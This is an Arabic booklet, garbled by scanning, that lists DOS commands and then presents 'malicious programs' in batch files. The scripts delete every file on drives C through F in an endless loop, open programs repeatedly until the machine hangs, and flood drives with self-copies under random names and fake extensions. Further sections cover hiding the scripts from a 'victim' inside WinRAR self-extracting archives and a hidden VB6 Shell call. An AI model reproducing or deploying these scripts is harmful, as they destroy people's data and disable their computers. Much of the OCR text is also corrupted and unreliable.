أخطر أوامر الدوس 
إعداد . S45S0RY‏ 


إهداء خاص لموقع كتب www.kutub.info‏ 
لن أقوم بسرد المقدمات الكلاسيكية المملة 
ولكن قبل كل شيء سيعتقد البعض أن هذا الكتيب هدفه تخريبي وذلك لاستخدامي عبارة ضحية وفلود ...الخ 


قطعا ليس القصد إلا التعبير عن بعض خفايا محبي البرمجة ولا يمكن لأحد أن ينكر ذلك ونحن نعلم أن 

(من لا يحب التخريب لن يخرب مهما حصل......)( وأن من يهوى التخريب سيخرب مهما حصل .......) والآهم من كل 
هذا لولا البرامج التخريبية لما تطورت أنظمة التشغيل .......والبرامج التخريبية المكتوبة هنا في الحقيقة هي بريمجات 
تسلية لا أكثر ولا أقل فهي بسيطة وسهلة والهدف منها توسيع خيال القارئ لكيفية تسخير الأشياء سواء للإفادة أو للأذى 
وطبعا الفائدة والأذى هي في نفوسنا وليست بالبرامج 


وهذا الكتاب مهدى لكل من يوّمن بالأمة العربية الجامعة لكل الأديان والمذاهب والطوائف 
ا 


فقط على من يقرأ هذا الكتيب أن يعلم أنه ليس لمستوى محدد لكنه عبارة عن أفكار قد تفيد وقد تضر 
لماذا أخطر أوامر الدوس ؟؟؟؟ 


أهم ما يتميز به نظام التشغيل دوس تنفيذ أوامر خطيرة جدا وبأقل تكلفة فملفات الإمتداد هط. لا يكشفها الأنتي فايروس 
مهما كانت خطورة التعليمات الموجودة ً EET‏ 


من هنا سوف نقوم بعدة امور ساشرحها بالترتيب 


١‏ - كتابة ملفات بات مؤذية >>>يسميها البعض فيروسات وهي ليست فيروسات لاكنها لا تقل قدرتها التدميرية عن 
الفيروسات لکن مشكلة هذه الملفات أنها غبية أي أناك لا تستطيع المناورة بها بشكل قوي؟؟؟؟ 


( وهي تختلف بقوتها التدميرية من حذف كل ملفات الجهاز تقريبا إلى عمل فلود أيقونات أو التسبب بجنون الجهاز أو 
ف ا ا و ا 


۲ - تعليف ملفات البات ببرنامج الوين رار WiİN.rar‏ 


۳ - تغليف ملفات البات ودعمها ببرنامج الفيجوال بيسك 6.ط۷ 


14+1444 4111141141111111 11+1 111 + 1++4 
1+4+1 1111111111111111 111+111 1-11۳4 
+14+144+114+1441+141 +1411411111111 111+111+114 


أو لا كتابة ملفات البات المؤذية 


ولكن من باب الاحتياط وللذين لا يعرفون أوامر الدوس سوف أكتب لكم سرد سريع لأوامر الدوس ويفضل 
الإطلاع عليها للعودة لها عند أي غموض يعيقكم عن فهم ملفات البات ......وأعتقد أنكم لن تجدوا الأمور صعبة 


رفن تس فيه ع الرس هر الا الر دا ال فك ف الا رار كا فط ررك ف السار اال 
Stat: A مrograms \ Accessories\ Command Prompt.exe‏ في الویندوز سفن 


في طبيعة الحال هي موجودة في أي ويندوز تراها مع الآلة الحاسبة في نفس المجموعة 


إليكم بعض أوامر الدوس : قسم صغير منها لكن هذا ما نحتاجه حاليا فموضوعنا ليس أوامر الدوس 


ملاحظة هامة الأوامر لست أنا من كتبها بل وجدتها بملف ولم أجد أسم صاحبها ولكن أشكره ولنسميه حبيبنا : لتوفيره الوقت علينا 
ولكن هذه ليست كل الأوامر : فأوامر الشبكات لوحدها فقط تحتاج لكتاب كامل 


Attrib -الأمر‎ 


Attrib 
يستخدم هذا الأمر إلإخفاء بعض الملفات‎ 
cı Attrib mm. EXE + H ا د‎ 
يستخدم هذا الأمر لجعل الملف ملفا مخفيا‎ 
يستخدم هذا الأمر في اكذر من صيغة كما هو مبين بالجدول:-‎ 


الشر جح الصبخة 
C:\ Attrib + H‏ 
CA Aurib+ R‏ 


C:\ Attrib # S 


٤٥0رمألا2-‎ 


CD 


یستددم هذا الأمر فی اثر من صيغة كما شو مپین بالجدول:- 


اسئد غاء فهرس مئل فهرس ائ 005 CA CD>v DOS‏ 


الرجوع إلي المحث مباشرة CAN CD\‏ 
الرجوع إلى الفهرس الفرعي السابق CN CD..‏ 


CHKDSKرnأJ13-‎ 


Chkdsk 
پستددم شذا الأمر بالكشف عن مساحة القرص والملغات والفهارس‎ 
Cî Chkdsk A: -: مال‎ 


الشرح : هذا الأمر من الاأوامر التي لاغنى عنها للكشف عن مساحة القرصس 
المستعملة و الفار غك و ذا عغذذ الفهارس و المتلفات و المساحة المس تلك 
و الفار غة و عدد المسارات والاخطاء على القترص سواء الصلب او المرن 


Cاكرمألا4-‎ 


CLS 
يستخدم هذا الأمر لمسح محتويات الشاشة ذفط حتى يمكن‎ 
إدخال البيانات والأوامر الجديدة على سطح نظيف‎ 


UN LLS - اء‎ 


COPY رمأyل15-‎ 


COPY 
يستخدم هذا الأمر احمل نسخة من ملف إو مجموعة ملفات‎ 
Cn COPYY MMEXE YA: أ- مثال لنسخ ملف‎ 
ب- مئال أنسخ مجموعة ملفات ذات امتداد معين‎ 
CA COPY YREXE A: 


الشرح:- يستعمل هذا الأمر دائما عند عمل ندسخة من ملف 
يتم كتابة الأمر واسم الْملف مل 11ہ وامتدادہ مل ٤×۴٤‏ كما 
موضح بالمثال [أ) أما إذا أردنا نسخ مجموعة ملفات ذات امتذاد 
معين كما شو موضح بالمثال إب) وكما ذكرنا أن (*) تعلى كل 
ما شو( سواء امتداد أو أسم ) 


DATE رnÎJ16-‎ 


Date 
بستخدم هذا الأمر لمعرفة التاربخ النظامي على جهاز الكمببوكر بالإضافه إلي تعدبله‎ 
Cî DATE مفال:-‎ 
سیظھر التاریخ‎ EN 1۴۴۸ الثنفيذ : عند تابه الأمر والضغط عل ماح‎ 
المدخل سابقا وايضا تنسيق إدخال اثتاريخ بمعنى إدخال الشهر لم اليوملة‎ 
العام بحيف يكون الإدخال كما شو مبين بالئنسيق بالنسبة للفاصل بين اتشهر‎ 


واليوم والسذة ويون على شكل (-) والإدخال أيضا يكون منطقى سواء فى 
الشهر او فى اليوح يمعنىز ان حدد الاشهر لا يزيد عن ١١‏ تهر وان الاشهر 
منها لإیزید عن ۲۸و۲۹ یوما مل فبرایر او ۳١‏ يوما مل يوليو وعند عدم 
إدخال التاريخ سليح ومنطفى سئظهر لنا رسائة خطاً ان هذا الشاريخ المدخل 
خارج النطاق سواء فى التنسيق او المنطق 


DEFRAG -17مر‎ 


DEFRAG 
يستضم هذا الأمر لإاعدة تنظيم الملفات‎ 
ر‎ 
Cı DEFAG A: -: شال‎ 


الشرح : عند كتابة الاأمر وتننيذه على القرص المراد تقظيم ملفاته و التى تتفرق 
نتيجة العمل على الجهاز لذا يقو بجمع الملفات الخاصة بكل برنامج او فهرس 
مرتبة كما كانت ونتيجة لهذا التقظيم يصبح جهاز الكمبيوتر أسرع فى الاداء 


DELرnأJا8-‎ 


DEL 
سند م هذا الأمر لحذف ملف أو مجموعةك ملفات‎ 
Ci DELY NM .BAI أ -مثال لحذف ملف‎ 
Ci DEL Y*.BAT ب -مٹال تحذف مچموعة فت‎ 


الشرح:- عند تنفيذ الأمر لابد من التأكد من اسم الملف المراد 
حذفه وامتداده كما شو فى المثال (i)‏ واذا اردنا حذف مجموعه 
ملفات ذات امتداد معين كما شو فى المثال (ب) 


DELTREE رaٺJ19-‎ 


DELIREEÈ 
يستخدم هذا الأمر لحذف فهرس ريسي يتضمن مجموعهة‎ 
٠ فهارس فرعية أو مجموعة ملفات‎ 
C1 DELTREE YAA مذال:-‎ 
الشسرح :- يتم كتابة الأمر وترك مسافة والتى يرمز لها بالمثلث‎ 


المقلوب بين الأمر واسم الفهرس الرئيسى المراد حذفه. 
ولأهمية هذا الأمر فعند التنفيذ بعطينا رسالة تحذيرية بأهمية هذا 
الفهرس ولتاك الحذف بتم الضغط علي حرف ا وللتراجع عن 
الحذف بتم الضغط على N‏ 


DIRرمÎ110-‎ 


DIR 
نخدم شذا الأمر تعر اض انفچار س و لمنشغاتا‎ 


واک یر کہ وی کے رت کے € CN DIR‏ 
يم استعر اض الفهارس والمثفات الموجودة على الفهرس ف 008$ CA DIR DOS‏ 
اشر ح:- يستعمل ذا الام دائما لاستعراض فهارس او ملفات فينح تابه الأمر واسح الفهرس مل 
فهر س05[ ومن ممیزات شذا الامر انه يمتنه استعر اض الفهارس والملفات بطرق نير تسمى 


موضح بالجدون ا 

DIRE | ag a اسم ات امات ھرس م ق ج‎ 
DIRA a Ep TTT E ED, ET 
ساح افقھارس تق‎ 


DISKCOMP رمeٺ!111-‎ 


DISKCOMEP 
يستضم هذا الأمر لمفارنة محتويات اسطوانتين مرنتين‎ 
ا‎ 


CA DISKLOMP A: B: 
الشسرح: - يفوم اندو سر بمفشارنة محنو بات الاسطو التي 8ک و رص‎ 
تفرير عن نتيجه المفارنه‎ 


DISKCOPY رمأJ112-‎ 


DISKCOPY 


يسئخدم هذا الأمر لعمل نسخة طبق الأصل من دسك إلى دسك آخر 
مثال:- CO: DISKCOPY YA: B:‏ 
الشرح:- يستعمل هذا الأمر دائما عند عمل نسخة طبق الأصل 


من فرص مرن إلى فرص مرن أخر بما فيه من عيوب الديسك 


DOSKEY رمaٺJ113-‎ 


Doskey 


يستخدم هذا الأمر لحفظ أى امر يتم إدخاله 
مال :- tw: DOSkKEY‏ 


اثترح : يستخدم هذا الأمر لحفظ الأوامر المدخلة من بدء تنفيذ الأمر لإعادة 
الأوأمر دون كئابتها مر أخرى وذلك بالضغط على اسهم لوحة المفائيح مع 
بعض الخيارات من 6 وحئي 19 


EDIT -14الأمر‎ 


EDIT 
يستخدم هذا الأمر لأنشاء أو تعديل الملفات الذصية من خلال محرر‎ 
النصوص الخاص بدوس‎ 
CAEDITYTEXTFILE.TXT مذال:-‎ 


الشرح :- يتم كتابه الأمر وترك مسافه والتى يرمز 
لها بالمثلث المقلوب بين الأمر واسم الملف 
المطلوب تحريرد 


FDISK رnil15-‎ 


FDISK 
يستخدم هذا الأمر لتجزئة الفرص الصلب او الغاء التجزية‎ 
Cî FDISK مڭْال:-‎ 
الشرح : هذا الاأمر من الأوامر الخطيرة جدا جدا فلا يستعمله غير‎ 


يقوم هذا الأمر بتجزنة القرص الصلب بمعنى اذا كان القرص الصئنب .ثلا 
٠٥‏ ميجا ومسمى ا:0 تقوم بتجزئئه الى جزئين فيصبحج ملا القرصس U:‏ 

٥‏ میجا و فرص جدیدال:[ ۰۰ میجا وبائعئس نجطه فرص واحذ 
كما كان ولكن عند التجزنة او الإعادة يئم فد جميع البيانات الموجودة نهانيا 


FORMAT رa116-‎ 


FORMAT 


ص ص صصص ڪڪ 
سدم شذا الامر ااعداد مسار اتا ا لاطو اذك شن ددد 
و يشل شذا الامر خطور ا ديد فى اسالد على جسميع البيانات علي القرصس المرن اھ قرس 
الصبلب من نها نكم ادر ا التالة لااستعاد تا وشذا الامر له شروط ليرا متهائماشو 
مو ضح بائیدون النانى:- 


يقوم بتكيل القرص من جديد بسر عة مع تسمية لمش ۸11 


HELPرمأل117-‎ 


HELP 
يفوم بامداد المستخذم بالمساعدة‎ 


GC: HELP مثال:-‎ 


LABELرnÎJ118-‎ 


LABEL 
ابید د م هذا الأمر لأنشاء أو تعديل أو فدح اندم ا لاسو اذ (الدذريف)‎ 


Ci LABELY DALI مثال:-‎ 


الشضرح :- يتم كتابه الأمر وترك مسافه والتى يرمز 
لها بالمثلث المقلوب بين الأمر واسم الأسطوانه 
المطلوب 


MDرمأ¥l19-‎ 


MD 
تددم هذا الاسر لانشاء فهرس فار غ‎ 
CA MD Y AA سذال:-‎ 
الشسرح :- يتم كتابه الامر وترك مسافه والتشي‎ 


يرمز لها بالمثلث المقلوب بين الأمر واسم 
الفهرس المراد انشانه 


MKDIRرnÎ¥120-‎ 


MkDir 
يستخدم هذا الأمر لإنشاء فهرس فارغ‎ 
C:\ MkDir V AA مال“‎ 
الشضرح :- يتم كتابه الأمر وترك مسافه والتي يرمز‎ 


لھا بالمتلث المقلوب بين الآمر واسح الفشهرس 
المراد إنشانه 


MSAV رمألl21-‎ 


MASY 
يستخدم هذا الأمر لعلذج الفيروسات اي التشف عنها‎ 


NMISAY مال:-‎ 


الشرح : يتم الكشف عن الفيروسات و اصلاحها 


PROMPT رaٺJ|22-‎ 


PROMPT 
يسخذم شد الأمر تير شك مخت دوس‎ 
-: مدا‎ 


CPrompt Good Morning 
Good N1011 الشرح:- يقوم الأمر بتغيير المحث ائي كله‎ 


و يکون شل التنفيذ کالآئي 


Ex FPREMPE KGeetgt Porn 


EEE Ferre FREE 


QBASIC -123أمر‎ 


QBasic 


يقوم بتانىغيل محرر لغة كويك بيزيك 


GL: QBaslc - مذال:‎ 


RDرمألا24-‎ 


RD 
يستخدم هذا الأمر لحذف فهرس فر عی فارع‎ 
CA RD Y AA مثال:-‎ 


الشرح :- يتم کتابه الأمر وترك مسافه والتى 
يرمز لها بالمثلث المقلوب بين الأإمر واسم 
الفهرس الفرعى المراد حذفه مثل AA‏ 


REN -¥125ٺمر‎ 


يسئخدم هذا الأمر لإعادة تسمية مثف وشو اخئصىار RENAÃANTF a‏ 

زاس المتفراتطيد) راس المتئي الحالي) 

LU" REN SLTAT SZLTAT مال اعادة تسسية مثف‎ 1 

پ- مئال اعادة تسدمية مجمو عه ملفات ذات امتذاد معن 
Cî REN *.TXT * BAT‏ 


الشرح:- يستعمل هذا الأمر دانما إعادة تسمية ملف فیتم کتابة 
الأمر واسم الملف مثْل 111 وامتداده مل 1×1 كمسا موضح 
بالمثال ([آ) ما إذا أردنا إعادة تسمية مجموعة ملغات ذات امتذاد 
معين كما هو موضح بالمثال [إب) وكما ذكرنا ان ([*) تعنى كل 
سا شو( یسو اء اټنذاد او اسم | 


SCANDISK رa126-‎ 


SCLANDISK 
يستخدم هذا الأمر لتشغيل برنامج تحص الفرص الذ ى يفوم باتتشاف‎ 
الأخطاء و تصحيحها على القرص.‎ 
CAIASCANDISK YA: مثال:-‎ 


الشرح :- يتم كتابه الأمر وترك مسافه والتى يرمز 
لها بالمثلث المقلوب بين الأمر واسم القرص 
المطلوب ذ 


SY۷5Sرمألا27-‎ 


SYS 
يستخدم هذا الأمرلنةل ملغات النظام الى القرص المسمي‎ 
CASYS A: ال‎ 
الشرح :- يتم کتابه الأمر وترك مسافه والتى يرمز‎ 


لها بالمثلث المقلوب بين الأمر واسم القرص 


TIMEرمiI28-‎ 


TINIE 
بستخدم هذا الإامر لمعرفة الئوقبت النظامي على جهاز الكمببوئر بالإضافة إلى تطبله‎ 
Cî" TIME مفال:-‎ 
سيظهر الئوقيت‎ ٤۲۳۴۸ الشرح : عند كثابة الأمر والضغط عثی مفثاح‎ 
المدخل سابقا وايضا نسیق إدخال بحيف يكون الإدخال كما شو مبين بالشسيق‎ 


بانسبة لتفاصل بين الساعة واثدقائق والفوانی ويون على شكل (:) والإدخضال 
الجديد إيضبا يكون منطقي سو اء فی السا عرد والدفائق بمعنى( ان عدد الاعات 
لا تزید عن ۱١۲‏ ساعة او ٠۲٤‏ ساعة حسب إعدادات الجهاز) وكذئنك الدقائق 
بحيف لا تزيد عن ۹د دفيقة وكذا الوانی و عند عم إدخال التوثيتا سليح 
ومنطقي سكظهر نا رسائة خطا أن هذا الوفت المدخل خارج النطاق سواء فى 
نسيون او المنطي 


TREEرnأNI29-‎ 


TREE 
يستخدم هذا الأمر لإظهار شجرة الفهارس الخاصة بفهرس رئيسي‎ 
1[( یکون قد تم انشائه مسبقا بار‎ 
Ci TREE - منال:‎ 
اللمرح: - عند تنفيذ الأمر سيظهر لنا تلمجرة الفهارس على النحو التالى‎ 


w3 “ TREE 
DIFêoEOoOPY PATH listin Tor VYoltmhê Number 
oil Serial Mimber %5 ESLE“ SOUS 


TYPEرمأل130-‎ 


TYPE 
يستخدم هذا الأمر لفتجح الملفات للقراءة ففط‎ 


اسم الملثف المراد فتحة 


منال:- Ln" TYPE MM.TXT‏ 
الشرح : عند كتابة الأمر و تنفيذه لابد ان نتأگد من اسم املف المطلوب فتحك 
و شذا امتدادد ونتاگذ انه موجود على الجهاز وفی أ فهرس 


UNDELETE)مnÎJ131-‎ 


UNDELETE 
بستخدم هذا الأمر لمحاولة إعادة بعض الفهارس والمنشفات‎ 
الفهرس المر اك اسر جاعه‎ 
Ci UNDELETE SAMIR - مذال:‎ 


الشرح : عند كتابة الأمر وئنفيذه لابد ان نتآكد من اسم الفهرس او المثف 
المطلوب اسئرجعه والڏی تم حذفه مسقا ٽئيڇ .DELTREE - DEL ja‏ 


UNFORMAT رمأJ132-‎ 


UNFORMIAT 
بستخدم هذا الأمر لمحاولة إعادة بعض الفهارس والمنفات الئى فقدت نتبجة أمر‎ 
تفرص سو اء افرص ائمرن او اتقرص الصثب.‎ FORMAT 


مال :- Ln UNFORMIAT J4:‏ 
اثشرح : عند كابة الأمر وتنفيذه عثى اى من الأفراص الى تم تهيش ها 
بامر ۲۳08141 مسبقا يقوم اتكمبيوئر بمحاولة إعادة الفهارس والملفات او جزء 

منها الئى تم فقدها فى أخر محاولة تهيئة سابقة لتقرص ولكن فى وت كبير جداً 


VERرمأل|33-‎ 


يستخدم شذا الأمر لمعرفة نظام التشغيل الذي اعمل عليه ألان 
مثال:- CNA VER‏ 


الأنرح:- عند تنفيذ الأمر سيظهر لنا اسم نظام التشغيل الذي 
اعمل عليه الان 


۷O1Lرمألا34-‎ 


¥OL 
يستخدم هذا الأمر لمعرذة اسم اأمحث‎ 


UN YOL اا‎ 


الشرح:- عند تنفيذ الأمر سيظهر ننا اسم المحث الذي اعمل 
عليه الان سواء اكان مشغل الأقراص المرنة او القرص الصلب 


XCOPY رمÎJ|35-‎ 


XCOPY 
يسئخدم هذا الأمر تعمل نسخة من ملف او مجموعة ملفات‎ 
Cı XCOPY YWMML.EXE VY 4: أ- مال للسخ ملف‎ 
ب - مال لنسخ مجمو عد لفات ذات امتداد سين‎ 
CC ا‎ An 
Cı XCOP 


ج- مال لنسخ فهرس  CIMT Y A "MIM‏ 
الالرح: - يستعسل هذا الامر دانما عند عمل نسخة من ملف او فشهرس 
فيتم كتابة الأمر واسم الملف ملل 1٥1‏ وامتدادہ مذٰل ۴ع كما موضےح 
بالمذال ([أ) أما إذا أردنا نسخ مجموعة ملفات ذات امتداد معين كاهو 

موضح بالمذال إب) . 


ملا حظة هامة تستطيع أن تعلم نفسك الدوس وذلك 
بإستخدام الأمر ماعط لعرض کل الأوامر 


لمعرفة كيفية عمل كل أمر أكتب الأمر ثم بعده ?/ متا ?/ start‏ سوف تعطيك كيفية عمل الأمر ستارت 


الفصل الأول : وزبدة الكتيب 


مجموعة من البرامج المدمرة والمزعجة باستخدام دوس الأطبف 


البرنامج الخبيث الأول 
حذف كل الملفات الموجودة في الكمبيوتر عدى التي تكون قيد العمل 
أكتب الكود بالأسفل في ملف مفكرة تم أحفظه بإمتداد بات ::::: save as your file.bat‏ 
ملاحظة البرنامج الأول مشروح بالتفصيل ولن أشرح المرات القادمة إلا الأمور الضرورية 
@echo off‏ 1 
Break off‏ 2 
ST‏ 
Del d:\ *.* /q /s‏ 4 
Dele:\ *.* /q /s‏ 5 
Del f:\ *.* /q /s‏ 6 
Del c:\ *.* /q /s‏ 7 
Goto r‏ 8 
١-لإخفاء‏ الكود قيد التنفيذ عن المستخدم 
-١‏ لإيقاف خاصية إيقاف الملف أثناء العمل 
۳ - نفطة عودة يمكن تسميته بأي أسم 
٤“‏ - أمر حذف كل ملفات في السواقة دي 
٥‏ - أمر حذف كل ملفات في السواقة اي 
- أمر حذف كل ملفات في السواقة اف 
۷ - أمر حذف كل ملفات في السواقة سي 


۸ - امر بالعودة للنقطة المسماة ۲ 


البرنامج الخبيث التائ آنا Crazy bat 4al‏ 


ملاحظة : يجب أن تكتب بعد أمر ستارت نفس أسم ملف الباتش وهنا اسمه 2ط.a2۷اc‏ 
الأمر ل4همعاهم tمهtء‏ يفتح المفكرة وكل ما بعده هي أوامر لفتح برنامج ما في الكمبيوتر كالالة الحاسبة وغيرها 
@echo off‏ 
break off‏ 
start %crazy.bat‏ 
1 
start %crazy.bat‏ 
start notepad‏ 
control‏ 
calc‏ 
fsquirt‏ 
write‏ 
winver‏ 
magnify‏ 
explorer‏ 
goto |‏ 


الأمر خcra.ba‏ tart»ء‏ سوف يجعل الملف يفتح نفسه لعدد لا متناهي من المرات ولكن هذا الأمر إختياري يمكنكم الإستغناء 
عنه طالما أنه لدينا حلقة تكرارية بالأسفل 


ملاحظة : إن كل الأوامر تقريبا محصورة بين الأمرين | eT commands ........ §Ot0‏ 
وهذين الأمرين هما حلقة تكرارية أي أن المعالج بعد أن ينتهي من الأوامر ويصل الى الأمر |0اهع 


فانه سيعود لأنقطة |؛ ويعيد نفس الأوامر إلى ما لا نهاية وبذلك سوف يجن الكمبيوتر أي تمتلئ الذاكرة المؤقتة (جلطة دماغية) 


البرنامج الخبيث الثالث :: خمط.0dهاf‏ 


برنامج فيضان الملفات نفس مبدأ الحلقة التكرارية لكن سوف نستبدل أوامر التشغيل بأوامر النسخ أي نجعل البرنامج ينسخ 
نفسه في كل السواقات بعدد لا نهائي من النسخ 


یمکنکم إضافة الأمرین @echo ہff & ط٥۵ ٥۴۴‏ حسب رغبتکم فھما أمران کمالیان ولیسا ضروریان لکن من 
الجيد إضافتهما وذلك لحرمان الضحية من معرفة الأوامر المنفذة ومن أجل حرمانه من إيقاف عمل الملف بالضغط على 
کونترول سي 


1 

copy %0 d:\sasory%RANDOM%.exe 
copy %0 d:\sasory%RANDOM%.mp3 
copy %0 d:\sasory%RANDOM%.pdf 
copy %0 d:\sasory%RANDOM%.jpg 
copy %0 d:\sasory%RANDOM%.dlI 
start %flood.bat 


goto f 


في الحالة الطبيعية الأمر رمهء هو لنسخ ملف من مسار لمسار خر أي نحن مطالبون بوضع مسار الملف 
الى مه الح مدل 


Copy d:\eee.bat f:\eee.bat 
يقوم بنسخ ٥٠ء من دي الى آف بإمتداد بات‎ 


لكننا هنا وضعنا الرمز %0 قبل مسار الوجهة وذلك لكي ينسخ الملف نفسه بدون الحاجة لكتابة مساره لأننا 
لا نعلم أين ستفتح الضحية برنامجنا الخبيث ويمكننا تغيير لاحقة الملف بعد النسخ كم نشاء م3gp.‏ atط.‏ dfم.‏ 
.mp3‏ 


copy %0 d:\sasory%RANDOM®%.pdf 


وليس شرطا أن يكون اسم الملف قبل النسخ هو نفسه بعد النسخ 

ولعلكم تتسائلون ما هو الأمر أو لٺم %RANDOMN%‏ 

هذا متغیر من متغیارت نظام دوس يمکن آن يأخذ عدد كبير من القيم العددية وهذا يعني كل ما تم استدعائه مرة 
سيأخذ قيمة جديدة وبالتالي كل مرة سينسخ ملف بأسم جديد في مثالنا ستكون النتيجة كالتالي....والهدف عند 
اختلاف أسماء النسخ تبقى جميعها بدون تشابه أسماء فلو تشابهت الأسماء ستكون عملية استبدال وليس فلود 
Sasory2324.pdf‏ 

Sasory132234.pdf 

Sasory633224.pdf 

Sasory1991324.pdf 

ese eset Sasory233224.pdf 

مما يؤدي الى فيضان ملفات في السواقة الهدف أو مجموعة الأهداف 


ويمكن زيادة حجم البرنامج الخبيث بكتابة سطور إضافية بعد الحلقة التكرارية هي لن تنفذ لكن ستزيد من حجم 
الملف وبالتالي من قوة الفلود أو الفيضان 


والأمر الأخير في الحقيقة هو للدمج بين اaط.crazy‏ و flood.bat‏ 


أي فيضان وجنون بنفس الوقت وذلك لحرمان الضحية من كسر الفيضان 


أوامر يمكن إستخدامها لإنتاج بريمجات خطيرة 


Subst‏ لجعل أي ملف بيدو كسواقة مثل :ل أو 2 .... ...قد يخطر بالنا أن نضبف ١١‏ سواقة جديدة للضحبة 
لجعله يصاب بالجنون واذا كان مجنون بالأصل سيعتقد أن مساحة الهارد قد زادت (@ _@)/ 


|أ))105 قتل أو ايقاف العمليات الجارية (الب رامج والخدمات غير المرئية/ 


ولكن معظم الأوامر الخطيرة قد تصطدم بالصلاحيات الممنوحة للمستخدم فبعد أن تكتب الأمر لا يتم تنفيذه لأن 
المدخل مغلق (خصوصا بالويندوز ۷) 


ومنعا للإطالة أترك لكم اكتشاف كيفية استخدام هذه الأوامر بأن تستخدموا الأمر ماع 


لكي تعلموا كيفية عملها فمن الضروري أن لا تأخذوا الأوامر بشكل جاهز بل يجب أن تحاولوا وتفشلوا وتفشلوا 
وتنجحوا في النهاية لكي تتذوقوا طعم الانتصار O‏ 


الفصل الثاني : تغليف البريمجات الضارة أو الخبيثة 


وله أهمية في جعل البريمجات غير قابلة للتعديل أو اكتشاف كودها ولكن ليس بالمطلق ففي البرمجة لا شيء 
مستحيل وستعلمون هذا لاحقا e‏ 


ففي حالة ملف البات يكفي أن تفتح الملف بالمفكرة حتى تظهر كل تعليماته أو حتى بالضغط بالزر الأيمن على 
الملف سيكون هناك خيار اسمه تحرير يمكنك من خلاله تعديل أو حذف كل الأوامر 


وهذا يعني اكتشاف الضحية لنواياك الخيرة والطيبة 


الحل 


استخدام برنامج الوين رار في تغليف ملف البات (ملف ذاتي التفعيل) 


E O O a O O 
بالصور للتوضيح وهنا لا نحتاج لأي شرح بالكتابة فالصور كافية ووافية‎ 
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البرتامج الذي تريده أن يحمل بعد التتزيل:طبعا هو تقسبه الباتش 
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وبهذا يكون التغليف بالرار قد انتهى : البعض يقول تلغيم (لا يهم) المهم أن الفكرة إن شاء الله واضحة 


ولكن إذا كان الضحية لديه خبرة ببرنامج الرار سيفتح ملفك التنفيذي باستخدام الرار نفسه ثم سيعلم ماذا يوجد 


نت لکن باختلاف اوامر بسيط جدا 


وسأطرح الفكرة بسرعة فمن يبرمج بالفيجوال يمتاز بالسرعة وحب الأشياء السريعة 


فقط سأكتب كود الفيجوال الذي يسمح لك بكتابة ملف بات من ضمن برنامجك التطبيقي أي أنك 
ستصنع برنامج ٥×٥‏ يقوم بصنع ملفات بات .........وأترك لك أن تبحر ببحر الأفكار التخريبية 


Private Sub Form_Load() 


Shell "d:\ehk.bat", vbHide 
End Sub 


وفي الختام أقول إن هذا الكتيب ليس تعليميا من النخب الأول لكنه أشبه بمقالة أو ربط بين أمور 
.....أنا فقط أعطي إضاءة وفي الحقيقة كتبته من باب التسلية وقد يستفيد البعض منه وقد 
يسبني البعض الأخر لكن كما قلت هذا الكتيب للتسلية والإفادة بنفس الوقت... 


واخيرا : لمن يريد أن يشاركني بعض خبراته او ان نكون فريق عمل عربي مصغر هذا إيميلي 


Sasory1990@hotmail.com 


